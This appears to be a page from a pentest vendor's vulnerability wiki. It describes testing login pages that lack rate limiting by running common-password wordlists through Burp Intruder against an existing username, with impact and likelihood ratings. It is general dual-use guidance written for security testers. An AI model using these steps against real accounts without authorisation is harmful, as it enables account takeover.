Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V2 - Authentication

Password Cracking for Common/Weak Passwords when Password Policy is Weak

POC

  1. If there is no rate-limiting in place for login pages, send the login request to Burp Intruder
  2. For an existing username, put common password wordlists for password input area
  3. Observe if any weak/common credential work for the existing user’s password

Impact

High

Likelihood

Medium (if password policy is complex)